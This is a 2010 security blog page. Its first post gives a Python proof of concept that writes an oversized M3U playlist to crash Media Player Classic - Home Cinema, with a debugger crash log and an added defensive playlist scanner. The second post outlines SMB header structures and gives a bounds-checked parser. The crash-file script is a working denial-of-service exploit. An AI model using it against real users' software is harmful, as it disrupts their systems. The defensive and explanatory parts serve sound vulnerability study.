Thursday, July 22, 2010

Media Player Classic - Home Cinema 1.3.1333.0 M3U File Heap Overflow/DoS (0-Day)

# Vulnerability Found: Praveen Darshanam
# Coded: Praveen Darshanam
# Greetz to all Andhra Hackers and ICW Members
# http://www.darshanams.blogspot.com
##########PoC Start################

print("\n*****Program needs to be run on Python 3.1*****")
print("""Media Player Classic - Home Cinema 1.3.1333.0 M3U File DoS (0-Day)

Tested on:
Windows XP SP3
Media Player Classic - Home Cinema
        Build number: 1.3.1333.0
        MPC Compiler: VS 2008
        FFmpeg Compiler: GCC 4.4.1
""")

head = "EXTM3U"      # playlist header string as used in the original PoC
buf = "D" * 1000     # oversized entry; around 1000 bytes triggers the C++ runtime error
mal_buf = head + buf
#print ("mal_buf:",mal_buf)
try:
    with open("mpc_m3u_crash.m3u", 'w') as mpc_mal:
        mpc_mal.write(mal_buf)
    print("File Created Successfully: mpc_m3u_crash.m3u\n")
except OSError as exc:
    print("Cannot Create M3U File: %s\n" % exc)

print ("[+] Found and Coded by: Praveen Darshanam\r\n")
##########PoC End################

When the M3U file is around 1000 bytes, the following "C++ Runtime Error Exception" is thrown.


If the buffer is increased further, Media Player Classic shows the error below but doesn't crash.


Playing with M3U file sizes between 950 and 2000 bytes will throw the above exceptions and occasionally lead to crashes. The crash report with the C++ exception is shown below.
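The trigger above is a single playlist entry far longer than any path or URL a player should accept. The following is an added example, not part of the original post, showing the bounds check a playlist loader (or a file-scanning rule) should apply before an entry reaches path or URL handling. The 260-character cap and the sample playlists are assumptions constructed for the example; the PoC sample reproduces the bytes the script above writes.

```python
# Defensive M3U reader: reject oversized entries instead of passing them on.
# Added example; the cap value and sample inputs are assumed, not from the post.
from typing import List, Tuple

MAX_ENTRY_LEN = 260  # assumed policy: MAX_PATH-sized cap on a single entry

# Constructed samples: the bytes the PoC script writes, and a benign playlist.
POC_SAMPLE = b"EXTM3U" + b"D" * 1000
BENIGN_SAMPLE = (b"#EXTM3U\n"
                 b"#EXTINF:123,Sample Title\n"
                 b"track01.mp3\n"
                 b"http://example.invalid/stream\n")


def scan_m3u(content: bytes, max_entry_len: int = MAX_ENTRY_LEN) -> List[Tuple[int, str]]:
    """Return (line_number, reason) findings; an empty list means the file passes.
    Line 0 is used for whole-file findings such as a missing header."""
    findings = []
    lines = content.decode("utf-8", errors="replace").splitlines()
    if not lines or not lines[0].startswith("#EXTM3U"):
        findings.append((0, "missing #EXTM3U header"))
    for number, line in enumerate(lines, 1):
        if len(line) > max_entry_len:
            findings.append((number, "entry length %d exceeds %d" % (len(line), max_entry_len)))
    return findings


def load_m3u_entries(content: bytes, max_entry_len: int = MAX_ENTRY_LEN) -> List[str]:
    """Return the playable entries (non-comment, non-empty lines) of a playlist
    that passed scan_m3u(); raise ValueError otherwise so callers fail closed."""
    findings = scan_m3u(content, max_entry_len)
    if findings:
        raise ValueError("rejected playlist: %s" % "; ".join(
            "line %d: %s" % (n, why) for n, why in findings))
    lines = content.decode("utf-8", errors="replace").splitlines()
    return [line.strip() for line in lines if line.strip() and not line.startswith("#")]


if __name__ == "__main__":
    for name, sample in (("poc", POC_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan_m3u(sample) or "ok")
```

The scan reports both the missing `#` on the header (the PoC writes a bare `EXTM3U`) and the 1006-character entry; a loader that only checks total file size would miss the second point, since the crash window the post describes is a function of entry length, not of the number of entries.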

--------------CRASH REPORT START----------------------
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
ModLoad: 73ee0000 73ee4000 C:\WINDOWS\system32\KsUser.dll
ModLoad: 10000000 100fb000 C:\Program Files\K-Lite Codec Pack\Filters\vsfilter.dll
ModLoad: 590b0000 590ce000 C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000 C:\WINDOWS\system32\MPR.dll
ModLoad: 6bf50000 6bfcd000 C:\WINDOWS\system32\dxmasf.dll
ModLoad: 02530000 0257f000 C:\WINDOWS\system32\DRMClien.DLL
(6dc.cec): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=01c2f36c edi=003fd08c
eip=7c812aeb esp=01c2f2e0 ebp=01c2f334 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
kernel32!RaiseException+0x52:
7c812aeb 5e pop esi
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:004> g
WARNING: Continuing a non-continuable exception
(6dc.cec): Break instruction exception - code 80000003 (first chance)
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=00000000 edi=003fd08c
eip=0071d14b esp=01c2f37c ebp=01c2f39c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mpc_hc+0x31d14b:
0071d14b cc int 3

-----------CRASH REPORT END-------------------

Monday, July 12, 2010

Server Message Block (SMB) Protocol Dissection

The primary goal of SMB is file transfer within a LAN.

SMB Header Structure:
SMB_Header
{
UCHAR Protocol[4];
UCHAR Command;
SMB_ERROR Status;
UCHAR Flags;
USHORT Flags2;
USHORT PIDHigh;
UCHAR SecurityFeatures[8];
USHORT Reserved;
USHORT TID;
USHORT PIDLow;
USHORT UID;
USHORT MID;
}

SMB Parameter Block:

SMB_Parameters
{
UCHAR WordCount;
USHORT Words[WordCount] (variable);
}


SMB Data Block:
SMB_Data
{
USHORT ByteCount;
UCHAR Bytes[ByteCount] (variable);
}
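The three structures above are what a dissector reads in sequence: a fixed 32-byte header, then a WordCount-prefixed parameter block, then a ByteCount-prefixed data block. The following is an added example, not part of the original post, of a parser for that layout in Python with struct; because WordCount and ByteCount come from the wire, every length is checked against the buffer before it is used. The sample message is a constructed SMB_COM_NEGOTIATE request (command 0x72); its Flags, Flags2, TID and PID values are assumed example values.

```python
# SMB (CIFS) header / parameter / data block parser with bounds checks.
# Added example; the sample message below is constructed, not captured traffic.
import struct
from dataclasses import dataclass, field
from typing import List

SMB_MAGIC = b"\xffSMB"
SMB_HEADER_LEN = 32
# Little-endian, packed SMB_Header: Protocol[4], Command, Status (32-bit SMB_ERROR),
# Flags, Flags2, PIDHigh, SecurityFeatures[8], Reserved, TID, PIDLow, UID, MID.
SMB_HEADER_FMT = "<4sBIBHH8sHHHHH"
assert struct.calcsize(SMB_HEADER_FMT) == SMB_HEADER_LEN

SMB_COM_NEGOTIATE = 0x72


@dataclass
class SmbMessage:
    command: int
    status: int
    flags: int
    flags2: int
    pid: int            # PIDHigh:PIDLow combined
    tid: int
    uid: int
    mid: int
    words: List[int] = field(default_factory=list)   # SMB_Parameters.Words
    data: bytes = b""                                 # SMB_Data.Bytes


def parse_smb(msg: bytes) -> SmbMessage:
    """Parse header, parameter block and data block; raise ValueError if any
    wire-supplied length (WordCount, ByteCount) does not fit the buffer."""
    if len(msg) < SMB_HEADER_LEN:
        raise ValueError("truncated: %d bytes, header needs %d" % (len(msg), SMB_HEADER_LEN))
    (proto, command, status, flags, flags2, pid_high, _sec, _reserved,
     tid, pid_low, uid, mid) = struct.unpack_from(SMB_HEADER_FMT, msg, 0)
    if proto != SMB_MAGIC:
        raise ValueError("bad protocol id %r" % proto)
    off = SMB_HEADER_LEN
    if off + 1 > len(msg):
        raise ValueError("truncated before WordCount")
    word_count = msg[off]
    off += 1
    param_len = word_count * 2                     # Words are USHORT
    if off + param_len > len(msg):
        raise ValueError("WordCount %d exceeds remaining %d bytes" % (word_count, len(msg) - off))
    words = list(struct.unpack_from("<%dH" % word_count, msg, off))
    off += param_len
    if off + 2 > len(msg):
        raise ValueError("truncated before ByteCount")
    (byte_count,) = struct.unpack_from("<H", msg, off)
    off += 2
    if off + byte_count > len(msg):
        raise ValueError("ByteCount %d exceeds remaining %d bytes" % (byte_count, len(msg) - off))
    data = msg[off:off + byte_count]
    return SmbMessage(command, status, flags, flags2, (pid_high << 16) | pid_low,
                      tid, uid, mid, words, data)


def is_well_formed(msg: bytes) -> bool:
    """True if parse_smb() accepts the message."""
    try:
        parse_smb(msg)
        return True
    except ValueError:
        return False


def negotiate_dialects(data: bytes) -> List[str]:
    """Split the NEGOTIATE data block: each dialect is 0x02 + NUL-terminated string."""
    return [item[1:].decode("ascii") for item in data.split(b"\x00") if item.startswith(b"\x02")]


def build_sample_negotiate() -> bytes:
    """Constructed NEGOTIATE request (assumed example field values)."""
    header = struct.pack(SMB_HEADER_FMT, SMB_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18, 0xC853,
                         0, b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
    dialects = b"\x02NT LM 0.12\x00"
    params = struct.pack("<B", 0)                  # WordCount = 0 for NEGOTIATE
    data = struct.pack("<H", len(dialects)) + dialects
    return header + params + data


if __name__ == "__main__":
    m = parse_smb(build_sample_negotiate())
    print("command=0x%02x pid=0x%04x dialects=%s" % (m.command, m.pid, negotiate_dialects(m.data)))
```

The checks on WordCount and ByteCount are the security-relevant part: both are attacker-controlled and a dissector that trusts them will read past the end of the received buffer.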


For further details:
http://msdn.microsoft.com/en-us/library/ee441466%28v=PROT.13%29.aspx
http://www.hsc.fr/ressources/articles/win_net_srv/